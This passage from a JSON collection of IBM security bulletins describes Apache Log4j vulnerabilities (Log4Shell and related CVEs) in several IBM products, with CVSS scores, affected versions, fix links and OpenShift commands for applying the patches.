**[CVE-2021-4104](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4104>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of untrusted data when the attacker has write access to the Log4j configuration. If the deployed application is configured to use JMSAppender, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215048](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215048>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. 
When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nITNM| 4.1.1.x \nITNM| 4.2.0.x \n \n\n\n## Remediation/Fixes\n\nAffected Product(s)| Version(s)| Remediation \n---|---|--- \nITNM| 4.1.1.x| \n\n[Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty](<https://www.ibm.com/support/pages/node/6526750> \"Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty\" )\n\nSee section: For V9.0.0.0 through 9.0.5.10:\n\nSee section: For V8.5.0.0 through 8.5.5.20:\n\nSee section: For V8.0.0.0 through 8.0.0.15:\n\nSee section: For V7.0.0.0 through 7.0.0.45: \n \nITNM| 4.2.0.x| \n\n[Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty](<https://www.ibm.com/support/pages/node/6526750> \"Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty\" )\n\nSee section: For V9.0.0.0 through 9.0.5.10:\n\nSee section: For V8.5.0.0 through 8.5.5.20:\n\nSee section: For V8.0.0.0 through 8.0.0.15:\n\nSee section: For V7.0.0.0 through 7.0.0.45: \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< 
http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\nNone\n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\nNone\n\n## Change History\n\n16 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. 
CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSSHRK\",\"label\":\"Tivoli Network Manager IP Edition\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF051\",\"label\":\"Linux on IBM Z Systems\"}],\"Version\":\"4.2.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-13T05:24:54", "type": "ibm", "title": "Security Bulletin: A security vulnerability has been identified in IBM WebSphere Application Server, which is a required product for IBM Tivoli Network Manager IP Edition (CVE-2021-4104, CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-01-13T05:24:54", "id": "747C7023F8D283A88FE9778F37629C7BF2E2A7E5268A695905F9F28590BF76D3", "href": 
"https://www.ibm.com/support/pages/node/6540526", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-08T23:46:14", "description": "## Summary\n\nIBM Operations Analytics Predictive Insights is affected by the Apache Log4j vulnerability through the WebSphere Application Server (WAS) component. There is a separate security bulletin (linked below) that describes vulnerabilities (CVE-2021-4104, CVE-2021-45046) in the Apache Log4j library as used by WebSphere Application Server. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-4104](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4104>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of untrusted data when the attacker has write access to the Log4j configuration. If the deployed application is configured to use JMSAppender, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215048](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215048>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. 
\nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\n**Principal Product and Version(s)**| **Affected Supporting Product and Version(s}** \n---|--- \nIBM Operations Analytics Predictive Insights - All| Websphere Application Server 8.5 \n \n\n\n## Remediation/Fixes\n\n**IBM strongly recommends addressing the vulnerabilities in IBM Operations Analytics Predictive Insights by upgrading IBM WebSphere Application Server now.**\n\nPlease use the instructions and full details disclosed in this security bulletin: [Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty (CVE-2021-4104, CVE-2021-45046)](<https://www.ibm.com/support/pages/node/6526750> \"Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty \\(CVE-2021-4104, CVE-2021-45046\\)\" )\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n17 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall 
CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSJQQ3\",\"label\":\"IBM Operations Analytics - Predictive Insights\"},\"Component\":\"\",\"Platform\":[{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"All\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-30T10:45:22", "type": "ibm", "title": "Security Bulletin: IBM Operations Analytics Predictive Insights impacted by Apache Log4j vulnerabilities (CVE-2021-4104, CVE-2021-45046)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": 
"COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-30T10:45:22", "id": "053134070CB8D6609B7F157DC74146FFBCB3EBE941406A677E889C3CAF773364", "href": "https://www.ibm.com/support/pages/node/6537584", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-08T21:53:38", "description": "## Summary\n\nIBM Tivoli Netcool Impact and IBM WebSphere Application Server are bundled as components of Tivoli Business Service Manager. Information about a security vulnerability affecting IBM Tivoli Netcool Impact and IBM WebSphere Application Server have been published in security bulletins.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Tivoli Business Service Manager| 6.2.0 \nIBM Tivoli Business Service Manager for the Enterprise| 6.2.0 \n \n## Remediation/Fixes\n\nIBM strongly recommends addressing the vulnerability now by applying the interim fixes below:\n\n_Principal Product and Version(s)_| _Affected Supporting Product and Version_ \n---|--- \nTivoli Business Service Manager 6.2.0 \nTivoli Business Service Manager for the Enterprise 6.2.0| \n\n**For WebSphere Application Server (WAS) traditional:**\n\n[Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty (CVE-2021-4104, CVE-2021-45046)](<https://www.ibm.com/support/pages/node/6526750> \"Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty \\(CVE-2021-4104, CVE-2021-45046\\)\" )\n\nFor V8.5.0.0 through 8.5.5.20: \n\u00b7 Upgrade to minimal fix pack levels as required by interim fix and then apply Interim Fix [PH42762](<https://www.ibm.com/support/pages/node/6526686> \"PH42762\" ) \n\\--OR-- \n\u00b7 Apply Fix Pack 8.5.5.21 or later fix pack if available. 
\n \n**For IBM Tivoli Netcool Impact: \n** \n[Security Bulletin: Vulnerability in Apache Log4j affects IBM Tivoli Netcool Impact (CVE-2021-44228)](<https://www.ibm.com/support/pages/node/6527266> \"Security Bulletin: Vulnerability in Apache Log4j affects IBM Tivoli Netcool Impact \\(CVE-2021-44228\\)\" ) \n \nFor 7.1.0.18 through 7.1.0.24: \nApply Interim Fix [7.1.0-TIV-NCI-IF0010](<https://www.ibm.com/support/pages/node/6536702> \"7.1.0-TIV-NCI-IF0010\" ) \n \n## Workarounds and Mitigations\n\nIBM strongly recommends to apply the interim fixes now.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n14 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. 
CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSSPFK\",\"label\":\"Tivoli Business Service Manager\"},\"Component\":\"-\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"6.1; 6.1.1; 6.2\",\"Edition\":\"All Editions\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-06T15:48:44", "type": "ibm", "title": "Security Bulletin: Apache Log4j vulnerability (CVE-2021-44228) has been identified in IBM Tivoli Netcool Impact and IBM WebSphere Application Server bundled with Tivoli Business Service Manager", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-01-06T15:48:44", "id": "A6A496B2E032EDA1F9C9B0D3982C6A52B7D925C02D0F2EFE157394C4851AEBA7", "href": 
"https://www.ibm.com/support/pages/node/6528944", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-05T01:50:17", "description": "## Summary\n\nIBM WebSphere Application Server (WAS) is shipped as a component of IBM Rational ClearCase. Information about security vulnerabilities affecting WAS have been published in security bulletins.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-38951](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38951>) \n** DESCRIPTION: **IBM WebSphere Application Server 7.0, 8.0, 8.5, and 9.0 is vulnerable to a denial of service, caused by sending a specially-crafted request. A remote attacker could exploit this vulnerability to cause the server to consume all available CPU resources. IBM X-Force ID: 211405. \nCVSS Base score: 7.5 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/211405](<https://exchange.xforce.ibmcloud.com/vulnerabilities/211405>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n \n** CVEID: **[CVE-2021-4104](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4104>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of untrusted data when the attacker has write access to the Log4j configuration. If the deployed application is configured to use JMSAppender, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base score: 8.1 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215048](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215048>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H) \n \n** CVEID: **[CVE-2021-45046](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45046>) \n** DESCRIPTION: **Apache Log4j could result in remote code execution, caused by an incomplete fix of CVE-2021-44228 in certain non-default configurations. When the logging configuration uses a non-default Pattern Layout with a Context Lookup, an attacker with control over Thread Context Map (MDC) input data can craft malicious input data using a JNDI Lookup pattern to leak sensitive information and remote code execution in some environments and local code execution in all environments. \nCVSS Base score: 9 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/215195](<https://exchange.xforce.ibmcloud.com/vulnerabilities/215195>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Rational ClearCase| 8.0.0 \nIBM Rational ClearCase| 9.0 \nIBM Rational ClearCase| 9.0.1 \nIBM Rational ClearCase| 9.1 \nIBM Rational ClearCase| 9.0.2 \nIBM Rational ClearCase| 8.0.1 \n \n## Remediation/Fixes\n\nRefer to the following security bulletin(s) for vulnerability details and information about fixes addressed by IBM WebSphere Application Server (WAS) which is shipped with IBM Rational ClearCase.\n\n**Principal Product and Version(s)**| **Affected Supporting Product and Version**| **Affected Supporting Product Security Bulletin** \n---|---|--- \nIBM Rational ClearCase, versions 8.0.0.x, 8.0.1.x, 9.0.0.x, 9.0.1.x, 9.0.2.x, 9.1.x| \n\nIBM WebSphere Application Server versions 7.0, 8.0, 8.5, and 9.0.\n\n| \n\n[Security Bulletin: Multiple vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty (CVE-2021-4104, CVE-2021-45046)](<https://www.ibm.com/support/pages/node/6526750> \"Security Bulletin: Multiple 
vulnerabilities in Apache log4j affect the IBM WebSphere Application Server and IBM WebSphere Application Server Liberty \\(CVE-2021-4104, CVE-2021-45046\\)\" )\n\n[Security Bulletin: WebSphere Application Server is vulnerable to a Denial of Service (CVE-2021-38951)](<https://www.ibm.com/support/pages/node/6524674> \"Security Bulletin: WebSphere Application Server is vulnerable to a Denial of Service \\(CVE-2021-38951\\)\" ) \n \n**ClearCase Versions**\n\n| \n\n**Applying the fix** \n \n---|--- \n8.0.0.x, 8.0.1.x, 9.0.0.x, 9.0.1.x, 9.0.2.x, 9.1.x| \n\n 1. Determine the WAS version used by your CCRC WAN server. Navigate to the CCRC profile directory (either the profile you specified when installing ClearCase, or `<ccase-home>/common/ccrcprofile`), then execute the script: `bin/versionInfo.sh `(UNIX) or `bin\\versionInfo.bat `(Windows). The output includes a section \"IBM WebSphere Application Server\". Make note of the version listed in this section. Check your installed version of IBM WebSphere Application Server against this bulletin's list of vulnerable versions.\n 2. Identify the latest available fixes (per the bulletin(s) listed above) for the version of WAS used for CCRC WAN server.\n 3. Apply the appropriate WebSphere Application Server fix directly to your CCRC WAN server host. No ClearCase-specific steps are necessary. 
\n \n_For 8.0.x and earlier releases, IBM recommends upgrading to a fixed, supported version/release/platform of the product._\n\n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\n## Change History\n\n21 Dec 2021: Initial Publication\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. 
CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## Document Location\n\nWorldwide\n\n[{\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Product\":{\"code\":\"SSSH27\",\"label\":\"Rational ClearCase\"},\"Component\":\"CCRC WAN Server\",\"Platform\":[{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF010\",\"label\":\"HP-UX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF033\",\"label\":\"Windows\"}],\"Version\":\"All versions\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB45\",\"label\":\"Automation\"}}]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-29T00:14:31", "type": "ibm", "title": "Security Bulletin: Multiple security vulnerabilities have been identified in IBM WebSphere Application Server shipped with IBM Rational ClearCase (CVE-2021-4104, CVE-2021-45046, CVE-2021-38951)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38951", "CVE-2021-4104", "CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-29T00:14:31", "id": 
"68F256DC5E144D5A2404101E56A66160645897F9BB7E8600047077C626B2FE43", "href": "https://www.ibm.com/support/pages/node/6528836", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-18T23:47:55", "description": "## Summary\n\nCloud Pak for Security (CP4S) v1.9.0.0 and earlier is impacted by Log4Shell (CVE-2021-44228), through the use of Apache Log4j's JNDI logging feature. This vulnerability has been addressed in the updated versions of CP4S images. Please see remediation steps below to apply fix. All customers are encouraged to act quickly to update their systems. Please note, this security bulletin has been superseded by Security Bulletin: Cloud Pak for Security is vulnerable to denial of service and arbitrary code execution due to Apache Log4j (CVE-2021-45105 and CVE-2021-45046) - see https://www.ibm.com/support/pages/node/6541156. \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-44228](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>) \n** DESCRIPTION: **Apache Log4j could allow a remote attacker to execute arbitrary code on the system, caused by the failure to protect against attacker controlled LDAP and other JNDI related endpoints by JNDI features. By sending a specially crafted code string, an attacker could exploit this vulnerability to load arbitrary Java code on the server and take complete control of the system. Note: The vulnerability is also called Log4Shell or LogJam. \nCVSS Base score: 10 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/214921](<https://exchange.xforce.ibmcloud.com/vulnerabilities/214921>) for the current score. 
\nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nCloud Pak for Security (CP4S)| 1.9.0.0 \nCloud Pak for Security (CP4S)| 1.8.1.0 \nCloud Pak for Security (CP4S)| 1.8.0.0 \nCloud Pak for Security (CP4S)| 1.7.2.0 \n \n## Remediation/Fixes\n\n**For Cloud Pak for Security 1.8.x and 1.9.x :**\n\nEnsure that you are logged in to the cluster by using either of the following oc login commands: \n \nUsing username and password:\n\n \noc login <openshift_url> -u <username> -p <password> \n \nUsing a token:\n\n \noc login --token=<token> \\--server=<openshift_url> \n \n \nCheck the current value of `imagePullPolicy` using the command : \n \noc get -n <CP4S_NAMESPACE> cp4sthreatmanagement threatmgmt -o yaml | grep imagePullPolicy: \n \nIf `imagePullPolicy` is not set to \"Always\" : \n \noc patch -n <CP4S_NAMESPACE> cp4sthreatmanagement threatmgmt --type merge --patch '{\"spec\":{\"extendedDeploymentConfiguration\":{\"imagePullPolicy\":\"Always\"}}}' \n \nElse, if the `imagePullPolicy` value is already set to \"Always\" : \n \noc delete pod -lsequence=idrmapp -n <CP4S_NAMESPACE> \n \nAfter executing either of the above commands the pods will restart which can be monitored using : \n \noc get pods -n <CP4S_NAMESPACE> -w** \n \n** \n\n\n**For Cloud Pak for Security 1.7.2.0 :**\n\nEnsure that you are logged in to the cluster by using either of the following oc login commands: \n \nUsing username and password:\n\noc login <openshift_url> -u <username> -p <password> \n\n\nUsing a token:\n\noc login --token=<token> \\--server=<openshift_url>\n\nSelect your CP4S namespace :\n\noc project _<CP4S_NAMESPACE>_\n\nCheck the current value of `imagePullPolicy` : \n\noc get iscinventory iscplatform -o yaml | grep 